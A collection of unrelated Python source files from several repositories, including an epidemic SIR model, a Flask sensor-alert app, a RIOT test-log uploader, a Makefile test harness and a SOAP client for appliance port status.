for field in required_fields:
if field not in data:
return (False, "Missing field: %s." % field)
elif not validate(field, data[field]):
return (False, "Invalid value for the field: %s." % field)
for field in optional_fields:
if field not in data:
continue
elif not validate(field, data[field]):
return (False, "Invalid value for the field: %s." % field)
return (True, "Data is valid.")
def validate(field, value):
return validators[field](value)
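if __name__ == '__main__':
    # Illustrative sketch (added for clarity; not part of the original module):
    # exercises is_valid() against the validators table above. The payload below
    # is entirely made up and the address is a placeholder, not a real contact.
    sample = {
        'enquiry': '9',
        'name': 'Test User',
        'email': 'user@example.com',
        'phone': '12345678',
        'subject': 'Locker key does not work',
        'message': 'Hello, my locker key stopped working this week. Please advise.'
    }
    print(is_valid(sample))    # expected: (True, 'Data is valid.')
    sample['email'] = 'not-an-email'
    print(is_valid(sample))    # expected: (False, 'Invalid value for the field: email.')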
``` |
{
"source": "jia1/xdk-json-parser",
"score": 2
} |
#### File: jia1/xdk-json-parser/app.py
```python
import configparser, jinja2, requests
from flask import Flask, jsonify
from flask_mail import Mail, Message
app = Flask(__name__)
@app.route('/')
def index():
data = requests.get('http://172.16.17.32:8082/mongodb/boschxdk03/latestdata').json()
return jsonify({key:value for key,value in data.items() if key in ['noiselevel','temperature','humidity','millilux']})
@app.route('/alert')
def alert():
config = configparser.ConfigParser()
config.read('secret.ini')
app.config['MAIL_SERVER'] = config['email'].get('server')
app.config['MAIL_PORT'] = config['email'].getint('port')
app.config['MAIL_USERNAME'] = config['email'].get('sender')
app.config['MAIL_PASSWORD'] = config['email'].get('password')
app.config['MAIL_USE_SSL'] = config['email'].getboolean('ssl')
app.config['MAIL_USE_TLS'] = config['email'].getboolean('tls')
mailer = Mail(app)
data = {
"subject": "[Alert] Please clean up!",
"message": "Your trap is full. Please clean it up ASAP!"
}
mail = Message(
subject = data['subject'],
recipients = config['email'].get('recipients').split(','),
sender = config['email'].get('sender')
)
template = jinja2.Environment(
trim_blocks = True,
lstrip_blocks = True,
autoescape = True,
loader = jinja2.FileSystemLoader('templates')
).get_template('email.html.j2')
mail.html = template.render(data)
mailer.send(mail)
return jsonify({"SENT": "OK"})
``` |
{
"source": "jia200x/open-sir",
"score": 3
} |
#### File: jia200x/open-sir/model.py
```python
import numpy as np # Numerical computing
from scipy.integrate import odeint # ODE system numerical integrator
from scipy.optimize import curve_fit
ABSERR = 1.0e-8
RELERR = 1.0e-6
DAYS = 7
NUMPOINTS = DAYS
def call_solver(func, p, w0, t):
"""
Internal function to wrap the solver.
The integrating routine *odeint* requires four parameters that were previously defined:
* func: function to be integrated.
* y0: vector of initial conditions of the state variables.
* t: discrete time-steps where the solution is going to be evaluated.
* args = (): Extra arguments to pass to the function. In our case, this is the vector of parameters **p**
"""
# Call the ODE solver.
sol = odeint(func, w0, t, args=(p,), atol=ABSERR, rtol=RELERR)
return np.insert(sol, 0, t, axis=1)
# pylint: disable=W0613
def sir(w, t, p):
""" SIR: Simple model of disease spread
inputs:
w: vector of state variables [S,I,R]
where
S: Fraction of the population susceptible to the infection
I: Fraction of the population infected
R: Fraction of the population recovered
t: Current time
p: vector of parameters
returns:
f: right hand side of the system of differential equations
"""
# unpack state variable
s, i, r = w # pylint: disable=W0612
# unpack parameter
alpha, beta = p
ds_dt = -alpha * s * i
di_dt = alpha * s * i - beta * i
dr_dt = beta * i
return [ds_dt, di_dt, dr_dt]
def sirx(w, t, p):
""" SIR-X: Dynamic outbreaks with temporally increasing
intervention
inputs:
w: vector of state variables [S,I,R,X]
where
S: Fraction of the population susceptible to the infection
I: Fraction of the population infected
R: Fraction of the population that recovered
X: Fraction of the population that is quarantined
t: time
p: vector of parameters
returns:
right hand side of the system of differential equations
"""
# unpack state variable
s, i, r, x = w # pylint: disable=W0612
# unpack parameter
alpha, beta, kappa_0, kappa = p
ds_dt = -alpha * s * i - kappa_0 * s
di_dt = alpha * s * i - beta * i - kappa_0 * i - kappa * i
dr_dt = kappa_0 * s + beta * i
dx_dt = (kappa_0 + kappa) * i
return [ds_dt, di_dt, dr_dt, dx_dt]
class Model:
""" Base model definition """
CSV_ROW = []
NUM_PARAMS = 4
NUM_IC = 4
FUNC = None
def __init__(self):
self.sol = None
self.p = None
self.pop = None
self.w0 = None
self.pcov = None
def _set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model. The parameter units are 1/day.
initial_conds: Initial conditions, in total number of individuals.
For instance, S0 = n_S0/population, where n_S0 is the number of subjects
who are susceptible to the disease.
"""
num_params = self.__class__.NUM_PARAMS
num_ic = self.__class__.NUM_IC
if len(p) != num_params or len(initial_conds) != num_ic:
raise Exception(
"Invalid number of parameters \
or initial conditions"
)
self.p = p
self.pop = np.sum(initial_conds)
self.w0 = initial_conds / self.pop
return self
def export(self, f, delimiter=","):
""" Export the output of the model in CSV format
Calling this before solve() raises an exception.
input:
f: file name or descriptor
delimiter: delimiter of the CSV file
"""
if self.sol is None:
raise Exception("Missing call to solve()")
np.savetxt(f, self.sol, header=delimiter.join(self.__class__.CSV_ROW), delimiter=delimiter)
def fetch(self):
""" Fetch the data from the model.
The first row is the time in days
"""
return self.sol
def solve(self, tf_days=DAYS, numpoints=NUMPOINTS):
""" Solve using children class model.
input:
tf_days: number of days to simulate
numpoints: number of points for the simulation.
output:
Reference to self
"""
tspan = np.linspace(0, tf_days, numpoints)
sol = call_solver(self.__class__.FUNC, self.p, self.w0, tspan)
# Multiply by the population
sol[:, 1:] *= self.pop
self.sol = sol
return self
@property
def r0(self):
""" Returns reproduction number
r0 = alpha/beta"""
return self.p[0] / self.p[1]
def fit(self, t_obs, n_i_obs, population, fit_index=None):
""" Use the Levenberg-Marquardt algorithm to fit
the parameter alpha, as beta is assumed constant
inputs:
t_obs: Vector of days corresponding to the observations of number of infected people
n_i_obs: Vector of number of infected people
population: Size of the objective population
Returns a reference to self
"""
# if no par_index is provided, fit only the first parameter
if fit_index is None:
fit_index = [False for i in range(len(self.p))]
fit_index[0] = True
# Initial values of the parameters to be fitted
fit_params0 = np.array(self.p)[fit_index]
# Define fixed parameters: this set of parameters won't be fitted
# fixed_params = self.p[fix_index]
def function_handle(t, *par_fit, population=population):
params = np.array(self.p)
params[fit_index] = par_fit
self.p = params
i_mod = call_solver(self.__class__.FUNC, self.p, self.w0, t)
return i_mod[:, 2] * population
# Fit parameters
par_opt, pcov = curve_fit(
f=function_handle, xdata=t_obs, ydata=n_i_obs, p0=fit_params0
)
self.p[fit_index] = par_opt
self.pcov = pcov
return self
# return p_new, pcov
class SIR(Model):
""" SIR model definition """
CSV_ROW = ["Days", "S", "I", "R"]
NUM_PARAMS = 2
NUM_IC = 3
FUNC = sir
def set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model [alpha, beta]. All these
values should be in 1/day units.
initial_conds: Initial conditions (n_S0, n_I0, n_R0), where:
n_S0: Total number of susceptible to the infection
n_I0: Total number of infected
n_R0: Total number of recovered
Note n_S0 + n_I0 + n_R0 = Population
Internally, the model initial conditions are the ratios
S0 = n_S0/Population
I0 = n_I0/Population
R0 = n_R0/Population
which is consistent with the mathematical description
of the SIR model.
output:
reference to self
"""
self._set_params(p, initial_conds)
return self
class SIRX(Model):
""" SIRX model definition """
CSV_ROW = ["Days", "S", "I", "R", "X"]
NUM_PARAMS = 4
NUM_IC = 4
FUNC = sirx
def set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model [alpha, beta, kappa_0, kappa]. All these
values should be in 1/day units.
initial_conds: Initial conditions (S0, I0, R0, X0), where:
n_S0: Total number of susceptible to the infection
n_I0: Total number of infected
n_R0: Total number of recovered
n_X0: Total number of quarantined
Note: n_S0 + n_I0 + n_R0 + n_X0 = Population
Internally, the model initial conditions are the ratios
S0 = n_S0/Population
I0 = n_I0/Population
R0 = n_R0/Population
X0 = n_X0/Population
which is consistent with the mathematical description
of the SIR-X model.
output:
reference to self
"""
self._set_params(p, initial_conds)
return self
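if __name__ == "__main__":
    # Illustrative usage sketch (added for clarity; not part of the original
    # open-sir module): shows the intended set_params -> solve -> fetch flow.
    # The rates and initial conditions below are made-up assumptions chosen only
    # to exercise the API, not fitted or recommended values.
    example = SIR()
    # alpha = 0.3/day, beta = 0.1/day; 990 susceptible, 10 infected, 0 recovered
    example.set_params(p=[0.3, 0.1], initial_conds=np.array([990.0, 10.0, 0.0]))
    example.solve(tf_days=DAYS, numpoints=NUMPOINTS)
    print("R0 =", example.r0)    # alpha / beta = 3.0
    print(example.fetch())       # column 0 is time in days, then S, I, R counts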
``` |
{
"source": "jia200x/riot_release_collector",
"score": 2
} |
#### File: jia200x/riot_release_collector/collect.py
```python
from glob import glob
import argparse
import os
import sys
import json
import requests
import configparser
CONFIG_FILE = "config.ini"
POST_URL="https://elk.inet.haw-hamburg.de/post/"
config = configparser.ConfigParser()
def get_access_token(args):
if hasattr(args, "access_token") and args.access_token:
if "GitHub" in config:
config["GitHub"]["access_token"] = args.access_token
else:
config["GitHub"] = {"access_token": args.access_token}
return args.access_token
else:
if "GitHub" in config:
return config["GitHub"].get("access_token")
else:
return None
def fetch_logs(result_directory, release_candidate):
files = glob(os.path.join(result_directory, "*/*/*/*"))
results = []
toolchain_file = open(os.path.join(result_directory, "toolchain"), 'r')
toolchain = toolchain_file.read()
toolchain_file.close()
for f in files:
res = os.path.relpath(f, result_directory).split("/")
sd = res[3].split(".", 1)
content_file = open(f, 'r')
content = content_file.read()
content_file.close()
data = dict(board=res[0],
concept=res[1],
module=res[2],
type=sd[0],
detail=sd[1],
log=content,
release_candidate=release_candidate,
toolchain=toolchain)
results.append(data)
return results
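def _example_fetch_logs(tmp_root):
    """Illustrative helper (added for clarity; not part of the original script).
    Builds a minimal result directory of the shape fetch_logs() expects --
    <board>/<concept>/<module>/<type>.<detail> below a root that also holds a
    plain-text "toolchain" file -- and returns the parsed results. Every name
    used here is a placeholder."""
    os.makedirs(os.path.join(tmp_root, "samr21-xpro", "tests", "periph_gpio"))
    with open(os.path.join(tmp_root, "toolchain"), "w") as f:
        f.write("gcc-arm-none-eabi (example)")
    leaf = os.path.join(tmp_root, "samr21-xpro", "tests", "periph_gpio", "compile.log")
    with open(leaf, "w") as f:
        f.write("example build output")
    return fetch_logs(tmp_root, 1)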
def post_results(access_token, results):
data = {"token": access_token,
"results": results}
request = requests.post(POST_URL, json.dumps(data),
headers={'Content-type': 'application/json',
'Accept': 'text/plain'})
if request.status_code == 200:
print("Successfully received logs. Thank you")
else:
print("There was an error (Wrong token?)")
sys.exit(1)
def main():
try:
config.read(CONFIG_FILE)
except FileNotFoundError:
pass
p = argparse.ArgumentParser()
p.add_argument('result_directory', nargs='?',
help='Result directory')
p.add_argument('release_candidate', nargs='?', type=int,
help='Release Candidate number')
p.add_argument("-t", "--access-token",
help="Github access token (create one at " +
"https://github.com/settings/tokens with access " +
"(repo, admin:gpg_key) if required)")
args = p.parse_args()
result_directory = args.result_directory
if not result_directory:
print("No result directory given\n")
p.print_help()
sys.exit(1)
release_candidate = args.release_candidate
if not release_candidate:
print("No Release Candidate given\n")
p.print_help()
sys.exit(1)
access_token = get_access_token(args)
if not access_token:
print("No access token found\n")
p.print_help()
sys.exit(1)
with open(CONFIG_FILE, "w") as configfile:
config.write(configfile)
results = fetch_logs(result_directory, release_candidate)
post_results(access_token, results)
if __name__ == "__main__":
main()
``` |
{
"source": "jia3857/Makefile.test",
"score": 3
} |
#### File: Makefile.test/test/TestVariousMakeInvocation.py
```python
import os
import logging
import unittest
import shutil
import subprocess
import tempfile
import sys
import textwrap
import string
import errno
import time
import signal
import psutil
import multiprocessing
def wait_for_condition(cond, true_count=1, max_retries=None, sleep_time=0.1 ):
retry = 0
while not cond() and (max_retries == None or retry < max_retries):
time.sleep(sleep_time)
retry = retry + 1
if retry == max_retries:
assert not "Condition was not true after {} retries".format(max_retries)
class TempDir(object):
""" A class that creates a temp directory at context creation time and
removes the temp dir at exit of the context."""
def __init__(self,retain=False):
# For debuggability, if retain is True, do not delete the temp dir
self.retain = retain
def __enter__(self):
self.d = tempfile.mkdtemp()
logging.debug("Using temporary directory: {}".format(self.d))
return self
def dir(self):
return self.d
def __exit__(self,type,value,traceback):
if self.retain:
msg = "TempDir: {0}".format(self.d)
logging.debug(msg)
print(msg)
else:
shutil.rmtree(self.d,ignore_errors=True)
return False
class Test(unittest.TestCase):
@staticmethod
def initLog(level):
"""Init the basic logging"""
logging.basicConfig(
format="%(asctime)s %(process)d %(threadName)s %(levelname)s " \
+"%(message)s",
stream=sys.stderr,
level=level)
@staticmethod
def _makefile_test_path():
""" Return the absolute path os the Makefile.test in this repo.
The actual file that is distributed via this repo"""
# Get the dir of the current script (TestVariousMakeInvocation.py) and
# from there knowing the directory structure of the repo, reach to the
# Makefile.test
# TODO: This section strictly depends on the file hierarchy of the repo.
file_dir = os.path.dirname(os.path.abspath(__file__))
repo_root_dir = os.path.dirname(file_dir)
makefile_test_path = os.path.join(repo_root_dir,"Makefile.test")
rv = os.path.realpath(os.path.abspath(makefile_test_path))
assert os.path.isfile(rv), "Could not find Makefile.test"
return rv
@staticmethod
def copy_makefile_test_to(d):
"""Copy the Makefile.test file from this repo to the given dir"""
src = Test._makefile_test_path()
dest = os.path.join(d, "Makefile.test")
shutil.copy(src, dest)
@staticmethod
def populate_test_dir(d, tests, test_dir_relative_to_makefile):
"""The given directory is the directory for the tests. Add the leaf makefile
there and copy the test scripts."""
if test_dir_relative_to_makefile == Test.same_dir:
path_to_makefile_test = "."
elif test_dir_relative_to_makefile == Test.child_dir:
path_to_makefile_test = ".."
else:
assert not "unexpected test_dir_relative_to_makefile"
contents = string.Template("""
TESTS ?= ${tests}
MAKEFILE_DIR := $$(shell dirname $$(realpath $$(lastword $$(MAKEFILE_LIST))))
include $$(MAKEFILE_DIR)/${path_to_makefile_test}/Makefile.test
""").substitute(
tests=" ".join(tests),
path_to_makefile_test=path_to_makefile_test)
contents = textwrap.dedent(contents)
leaf_makefile_name = "Makefile"
leaf_makefile_path = os.path.join(d, leaf_makefile_name)
with open(leaf_makefile_path, "w") as f:
f.write(contents)
file_dir = os.path.dirname(os.path.abspath(__file__))
for test_file in tests:
shutil.copy(os.path.join(file_dir, test_file),
os.path.join(d, test_file))
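# Illustrative sketch (added for clarity; not part of the original test): for
# tests=["passing_test.sh"] and a child test directory, the template above
# renders a leaf Makefile along these lines:
#
#   TESTS ?= passing_test.sh
#   MAKEFILE_DIR := $(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
#   include $(MAKEFILE_DIR)/../Makefile.test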
@staticmethod
def make_dirs_ignore_existing(p):
"""unix mkdir -p functionality. Creates the directory given in the path
p. Also creates the intermediate directories. Does not complain if the
root directory exists already."""
try:
os.makedirs(p)
except OSError as e:
if e.errno==errno.EEXIST and os.path.isdir(p):
pass
else:
raise
def find_file_at_root(self, d, seeked_files):
"""Check whether at least one of the given seeked_files exist in the given
directory root. If found return the name of the file, otherwise return
None"""
for root, dirs, files in os.walk(d):
for file_name in files:
if file_name in seeked_files:
return file_name
return None
def check_no_intermediate_files(self, d):
"""Verify that in the directory tree rooted at d there are no intermediate
files left behind"""
# taken from the makefile.
intermediate_file_names = [".makefile_test_failed_tests",
".makefile_test_executed_tests"]
found_file = self.find_file_at_root(d, intermediate_file_names)
if found_file != None:
self.assertFalse("Found unexpected file: {} in dir: {}".format(
found_file, d))
def check_return_value(self, rv, expected_rv):
"""If expected_rv is zero, return value must be zero.
If expected_rv is non-zero, then the return value must be non-zero"""
self.assertEqual(rv, expected_rv)
def check_output(self, out, expected_output):
""" Verify the stdout from the makefile. The given regex in expected_output
must match in out"""
self.assertRegexpMatches(out, expected_output)
@staticmethod
def pids_of_descendant_sleep(pid):
"""Look at all of the descendants of pid and find the sleep processes.
Return the sleeps' pids"""
p = psutil.Process(pid)
descendants = p.children(recursive=True)
sleep_pid = []
for d in descendants:
if "sleep" in d.exe():
assert not (d.pid in sleep_pid)
sleep_pid.append(d.pid)
return sleep_pid
@staticmethod
def sleep_process_with_pid(pid):
"""Check that a sleep process with the given pid exists or not.
If it does not return none"""
try:
p = psutil.Process(pid)
except psutil.NoSuchProcess as e:
return None
exe = None
while exe is None:
try:
exe = p.exe()
except psutil.AccessDenied as e:
pass
except psutil.NoSuchProcess as e:
return None
if "sleep" in exe:
return p
else:
return None
@staticmethod
def get_clean_env():
"""Get an environment to passed to the make executions.
This script is executed in the same Makefile itself remove the
exported environment variables so that the make execution tests can
start from a clean slate"""
env = dict(os.environ)
env.pop("TESTS", None)
env.pop("FIRST_MAKEFILE", None)
env.pop("FIRST_MAKEFILE_DIR", None)
env.pop("TEST_TARGETS", None)
return env
wait, term, sigint = range(3)
do_check, skip_check = range(2)
def call_make_do_checks(self, cmd, parent_dir, run_dir, expected_rv,
expected_output, subprocess_handling, check_intermediate_files):
"""Spawns the make command and does some additional checking."""
# remove the exported makefile variables from the environment.
# This test verifies the Makefile.test but it is executed using
# Makefile.test. The tests in this repo also use the Makefile.test. In
# the supported use case Makefile.test is designed to be a singleton.
# With removing these exported variables, we remove the modifications
# the parent makefile did on the environment.
env = Test.get_clean_env()
descendent_sleep_pids = None
def in_new_pgrp():
os.setpgrp()
return
if subprocess_handling == Test.wait:
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
elif subprocess_handling == Test.term:
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
# Wait for an executedTests file to appear. That means the tests
# have started. Then terminate the make.
wait_for_condition(lambda: self.find_file_at_root(parent_dir, \
[".makefile_test_executed_tests"]) != None)
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
while len(descendent_sleep_pids) == 0:
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
# Send the signal to the entire process group id.
# Killing the process group is the recommended way to kill hung makes.
os.killpg(p.pid, signal.SIGTERM)
elif subprocess_handling == Test.sigint:
# Make has child processes. We want to send the SIGINT to the
# entire process group of make. This resembles the CTRL-C behavior
# from the terminal. In order to get its own process group, we call
# the preexec_fn before spawn
p = subprocess.Popen(cmd,
cwd=run_dir,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
# Wait for an executedTests file to appear. That means the tests
# have started. Then ctrl-C the make .
wait_for_condition(lambda: self.find_file_at_root(parent_dir, \
[".makefile_test_executed_tests"]) != None)
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
while len(descendent_sleep_pids) == 0:
descendent_sleep_pids = Test.pids_of_descendant_sleep(p.pid)
# Send the signal to the entire process group id.
os.killpg(p.pid, signal.SIGINT)
out, err = p.communicate()
rv = p.returncode
logging.debug(out)
logging.debug(err)
self.check_return_value(rv, expected_rv)
if expected_output is not None:
self.check_output(out, expected_output)
if check_intermediate_files == Test.do_check:
self.check_no_intermediate_files(parent_dir)
self.check_no_intermediate_files(run_dir)
if descendent_sleep_pids != None:
# If we had any sleep processes, then they must have disappeared by now.
self.assertTrue(all(
[Test.sleep_process_with_pid(p) == None \
for p in descendent_sleep_pids]))
def handle_additional_filename(self,additional_file_name, test_dir_path):
"""The test_dir_path needs to have an additional_file_name. If the
additional_file_name exists in current dir, copy it over. Otherwise
create a new file in test_dir_path"""
this_file_dir = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(this_file_dir, additional_file_name)
if os.path.isfile(file_path):
shutil.copy(file_path, test_dir_path)
else:
with open(os.path.join(test_dir_path, additional_file_name), "w"):
pass
same_dir, child_dir = range(2)
def make_execution(self,
test_dir_relative_to_makefile,
tests,
expected_rv,
expected_output,
subprocess_handling,
check_intermediate_files,
additional_file_name=None,
):
"""Execute make in various different ways in a tests directory.
1) cd <test_dir> && make check
2) make -C <test_dir> check
3) make -f <test_dir>/Makefile check
Depending on test_dir_relative_to_makefile, the leaf makefile and the
Makefile.test can be in the same or different directories.
tests is a list of names of the tests to execute.
Depending on expected_rv, the tests are checked to pass or fail.
The regex given in expected_output must match in the stdout of the make
execution
subprocess_handling determines whether the caller is going to wait for make
to complete, or terminate it or kill it.
if an additional_file_name is specified, then a new file with that name
is placed in the test directory. If the file exists in current dir,
that gets copied. Otherwise a new file is touched. """
with TempDir() as td:
d = td.dir()
if test_dir_relative_to_makefile == Test.same_dir:
test_dir_path = d
elif test_dir_relative_to_makefile == Test.child_dir:
test_dir_path = os.path.join(d, "test")
else:
assert not "unexpected test_dir_relative_to_makefile"
Test.make_dirs_ignore_existing(test_dir_path)
if additional_file_name != None:
self.handle_additional_filename(additional_file_name, test_dir_path)
Test.copy_makefile_test_to(d)
Test.populate_test_dir(test_dir_path, tests,
test_dir_relative_to_makefile)
# Execute make with jobserver and without.
self.call_make_do_checks(["make"], d, test_dir_path, expected_rv,
expected_output, subprocess_handling, check_intermediate_files)
self.call_make_do_checks(["make", "-j"], d, test_dir_path, expected_rv,
expected_output, subprocess_handling, check_intermediate_files)
with TempDir() as runDir:
rd = runDir.dir()
self.call_make_do_checks(["make", "-C", test_dir_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
self.call_make_do_checks(["make", "-j", "-C", test_dir_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
leaf_makefile_path = os.path.join(test_dir_path, "Makefile")
self.call_make_do_checks(["make", "-f", leaf_makefile_path], d, rd,
expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
self.call_make_do_checks(["make", "-j", "-f", leaf_makefile_path],
d, rd, expected_rv, expected_output, subprocess_handling,
check_intermediate_files)
def test_make_execution_success(self):
"""Verify make behavior if the outcome is successful. Either all tests
have passed or there were no tests to start with."""
logging.debug("Running success tests")
self.make_execution(Test.child_dir,
["passing_test.sh"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["passing_test.sh", "passing_test1.sh"],
0,
"All\s*2 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh","passing_test1.sh"],
0,
"All\s*2 tests passed",
Test.wait,
Test.do_check)
# Empty Test.
self.make_execution(Test.child_dir,
[],
0,
"All\s*0 tests passed",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
[],
0,
"All\s*0 tests passed",
Test.wait,
Test.do_check)
# A python test
self.make_execution(Test.child_dir,
["ExamplePythonTest.py"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check,
additional_file_name="ExamplePythonLibrary.py")
self.make_execution(Test.same_dir,
["ExamplePythonTest.py"],
0,
"All\s*1 tests passed",
Test.wait,
Test.do_check,
additional_file_name="ExamplePythonLibrary.py")
def test_make_execution_failure(self):
"""Verify make behavior if the outcome is unsuccessful. At least one test
has failed."""
logging.debug("Running failure tests")
self.make_execution(Test.child_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["failing_test.sh", "failing_test1.sh"],
2,
"Failed\s*2 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["failing_test.sh", "failing_test1.sh"],
2,
"Failed\s*2 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.child_dir,
["passing_test.sh", "failing_test.sh"],
2,
"Failed\s*1 out of\s*2 tests",
Test.wait,
Test.do_check)
self.make_execution(Test.same_dir,
["passing_test.sh", "failing_test.sh"],
2,
"Failed\s*1 out of\s*2 tests",
Test.wait,
Test.do_check)
# A target with "TARGET_FOR_" prefix is used in the Makefile.test
# implementation. We make sure we still execute the test even if
# coincidentally there is a file with that name in the test directory.
self.make_execution(Test.child_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check,
additional_file_name="TARGET_FOR_failing_test.sh")
self.make_execution(Test.same_dir,
["failing_test.sh"],
2,
"Failed\s*1 out of\s*1 tests",
Test.wait,
Test.do_check,
additional_file_name="TARGET_FOR_failing_test.sh")
def test_make_execution_sigterm(self):
"""Verify make behavior if it is terminated with SIGTERM"""
logging.debug("Running sigterm tests")
tests_lists = [
["indefinite_test.sh"],
["indefinite_test.sh", "indefinite_test1.sh"],
["indefinite_test.py"],
["indefinite_test.py", "indefinite_test1.py"],
]
for test_list in tests_lists:
# Makefile.test does not print a summary line if it gets TERMINATED
self.make_execution(Test.child_dir,
test_list,
-signal.SIGTERM,
None,
Test.term,
Test.do_check)
self.make_execution(Test.same_dir,
test_list,
-signal.SIGTERM,
None,
Test.term,
Test.do_check)
def test_make_execution_sigint(self):
"""Verify make behavior if it is terminated with a CTRL-C from the terminal
AKA send sigint to its process group"""
logging.debug("Running sigint tests")
tests_lists = [
["indefinite_test.sh"],
["indefinite_test.sh", "indefinite_test1.sh"],
# Python exits with 1 in case of an unhandled KeyboardInterrupt
# instead of -SIGINT. It is worth testing our Makefile.test with
# executables that do not exit with -SIGINT in response to a SIGINT.
["indefinite_test.py"],
["indefinite_test.py", "indefinite_test1.py"],
]
for test_list in tests_lists:
# Makefile.test does not print a summary line if it gets CTRL-C'ed
self.make_execution(Test.child_dir,
test_list,
-signal.SIGINT,
None,
Test.sigint,
Test.skip_check)
self.make_execution(Test.same_dir,
test_list,
-signal.SIGINT,
None,
Test.sigint,
Test.skip_check)
@staticmethod
def descendant_sleep_process_count(pid):
"""Count the number of descendant sleep processes of the given pid"""
p = psutil.Process(pid)
descendants = p.children(recursive=True)
sleep_count = 0
for d in descendants:
if "sleep" in d.exe():
sleep_count = sleep_count + 1
return sleep_count
def make_parallelism(self, cmd, tests, expected_parallel_jobs):
""" Populate a test dir with the given tests, execute the given cmd.
While the test is running, verify that the expected number of parallel
jobs can be found in the recursive children of the make command"""
with TempDir() as td:
d = td.dir()
Test.copy_makefile_test_to(d)
Test.populate_test_dir(d, tests, Test.same_dir)
env = Test.get_clean_env()
def in_new_pgrp():
os.setpgrp()
return
p = subprocess.Popen(cmd,
cwd=d,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=in_new_pgrp)
pid = p.pid
wait_for_condition(lambda: self.find_file_at_root(d, \
[".makefile_test_executed_tests"]) != None)
# Both of the indefinite_tests should be running in parallel.
check_count = 3
for i in range(check_count):
wait_for_condition(lambda: Test.descendant_sleep_process_count(pid) \
== expected_parallel_jobs)
os.killpg(pid, signal.SIGTERM)
out, err = p.communicate()
logging.debug(out)
logging.debug(err)
@unittest.skipIf(multiprocessing.cpu_count() == 1,
"Host machine has only 1 processor, it does not support parallel execution.")
def test_make_parallelism(self):
"""Verify that parallel execution of make actually executes processes in
parallel"""
self.make_parallelism(["make", "-j"],
["indefinite_test.sh", "indefinite_test1.sh"],
2)
self.make_parallelism(["make", "-j", "1"],
["indefinite_test.sh", "indefinite_test1.sh"],
1)
if __name__ == '__main__':
Test.initLog(logging.DEBUG)
unittest.main()
# Test Plan
# 1) Add a test to verify command line overwrite of TESTS.
``` |
{
"source": "jia57196/code41",
"score": 3
} |
#### File: test/gn_persist_call_id/list-files.py
```python
import os, sys, time
if len(sys.argv) < 2:
print "usage: %s directory..." % sys.argv[0]
sys.exit(1)
def get_date(file_name):
i = file_name.rfind('-')
if i == -1:
return ""
t = int(file_name[i+1:])
return time.ctime(t)
for dir in sys.argv[1:]:
print dir
for file_name in sorted(os.listdir(dir)):
print " %s - %s" % (file_name, get_date(file_name))
```
#### File: iwf/scripts/pi-br.py
```python
import os, sys, tempfile
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import suds
import urllib2
import xml.etree.ElementTree
from xml.etree.ElementTree import Element
url = 'https://localhost:8443/instrument/externalAPI.cfc?wsdl'
user = "Administrator"
password = "<PASSWORD>"
class Card:
def __init__(self, number, model, serial_number, mode):
self.number = number
self.model = model
self.serial_number = serial_number
self.mode = mode
self.ports = list()
def add_port(self, port):
self.ports.append(port)
class Port:
def __init__(self, number):
self.number = number
class PI_API(suds.client.Client):
def __init__(self, url):
"""May throw an exception if url is invalid"""
super(PI_API, self).__init__(url)
def get_card_info(self, user, password):
try:
info = self.service.getAboutAppliance(user, password)
#print info
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
root_element = xml.etree.ElementTree.XML(info)
cards = dict()
for card_element in root_element.getiterator("card"):
for child in card_element.getiterator():
if child.tag == "cardNum":
number = child.text
elif child.tag == "model":
model = child.text
elif child.tag == "sn":
serial_number = child.text
elif child.tag == "mode":
mode = child.text
cards[number] = Card(number, model, serial_number, mode)
return cards
def get_card_and_port_status(self, user, password):
try:
status = self.service.getCardAndPortStatus(user, password)
#print status
except suds.WebFault as error:
print >> sys.stderr, error.args
return None
return xml.etree.ElementTree.XML(status)
def merge(self, cards, status):
for port_status in status.getiterator("portStatus"):
card_number = port_status.findtext("card")
if card_number not in cards:
continue
port_number = port_status.findtext("port")
port = Port(port_number)
cards[card_number].add_port(port)
for child in port_status.getiterator():
if child.tag == "time":
port.status_time = child.text
elif child.tag == "status":
port.status = child.text
elif child.tag == "speed":
port.speed = child.text
elif child.tag == "utilization":
port.utilization = child.text
elif child.tag == "dBm":
port.dBm = child.text
elif child.tag == "sfp":
port.sfp = child.text
elif child.tag == "fcsErrors":
port.fcsErrors= child.text
elif child.tag == "framesCount":
port.framesCount = child.text
elif child.tag == "framesDropped":
port.framesDropped = child.text
return cards
def build_report(self, cards):
root_element = Element("hardware")
root_element.text = "\n "
vendor = Element("vendor")
vendor.text = "BladeRocket"
vendor.tail = "\n "
root_element.append(vendor)
